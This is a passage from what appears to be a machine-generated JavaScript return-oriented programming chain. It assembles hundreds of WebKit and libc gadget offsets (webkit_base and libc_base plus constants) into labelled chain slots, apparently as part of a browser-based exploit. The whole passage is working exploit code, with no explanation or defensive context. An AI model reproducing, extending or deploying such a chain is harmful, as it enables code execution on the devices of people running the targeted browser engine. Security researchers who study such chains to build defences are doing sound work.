libc_base+764760, //pop rsi ropchain+77904, //L297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77920, //L298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77888, //L296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L296: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L297: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L298: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+78000, //L299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+78016, //L300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L299: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L300: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+78104, //L301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+78120, //L303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L301: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L303: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L304: db([4294967283, 4294967295]); // -0xd set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L306: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+78280, //L309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78264, //L307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L307: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L309: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+78424, //L312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78392, //L310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+78408, //L311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L311: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L312: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+78496, //L314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L314: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+78552, //L315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L315: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+78632, //L317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L317: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L319: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+78752, //L322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78736, //L320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L320: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L322: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+78928, //L325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+78944, //L326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78896, //L323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+78912, //L324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L323: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L324: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L325: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L326: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+79056, //L327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+79088, //L329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+79072, //L328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L328: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L329: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+79176, //L331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L331: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+79232, //L332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L332: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+79376, //L335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+79392, //L336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+79360, //L334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L334: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L335: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L336: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+79552, //L340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+79520, //L338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+79536, //L339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L337: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L338: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L339: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L340: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+79608, //L342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L342: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+79736, //L344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+79752, //L345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+79720, //L343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L343: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L344: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L345: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+79912, //L349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+79880, //L347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+79896, //L348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L346: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L347: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L348: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L349: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+79968, //L351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L351: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+80096, //L353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80112, //L354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80080, //L352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L352: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L353: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L354: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+80272, //L358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+80240, //L356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80256, //L357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L355: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L358: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+80328, //L360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L360: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+80456, //L362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80472, //L363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80440, //L361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L361: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L362: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L363: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+80552, //L364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80568, //L365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L364: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L365: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+80728, //L369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+80696, //L367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80712, //L368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L366: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L367: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L368: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L369: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+80784, //L371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L371: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+80912, //L373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80928, //L374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80896, //L372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L372: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L373: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L374: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+81024, //L376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+81008, //L375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L375: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+81104, //L377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L377: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L379: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+81224, //L382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81208, //L380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L382: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+81368, //L385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81336, //L383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+81352, //L384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L384: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L385: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+81440, //L387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L387: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+81496, //L388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L388: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L390: db([7, 0]); // 0x7 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+81624, //L391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L391: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L393: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+81744, //L396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81728, //L394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L394: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L396: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+81920, //L399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+81936, //L400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81888, //L397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+81904, //L398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L397: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L398: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+82048, //L401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+82080, //L403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+82064, //L402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L401: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L403: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+82192, //L404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+82208, //L405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L405: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+82296, //L407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L407: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+82352, //L408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+82424, //L411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L411: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+82480, //L412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+82568, //L414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L416: db([4294967283, 4294967295]); // -0xd set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+82688, //L419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+82672, //L417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L417: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L419: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+82848, //L423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+82816, //L421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+82832, //L422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L420: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L421: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L422: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L423: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+82904, //L425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L425: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+83032, //L427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83048, //L428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83016, //L426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L426: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L427: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L428: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83208, //L432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+83176, //L430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83192, //L431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L429: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L430: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L431: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L432: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+83264, //L434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L434: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+83392, //L436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83408, //L437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83376, //L435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L435: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L436: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L437: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83488, //L438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83504, //L439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L438: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L439: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83664, //L443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+83632, //L441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83648, //L442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L440: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L441: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L442: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L443: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+83720, //L445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L445: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+83848, //L447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83864, //L448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83832, //L446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L446: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L447: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L448: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83960, //L450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83944, //L449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L450: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+84040, //L451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L451: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L453: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi 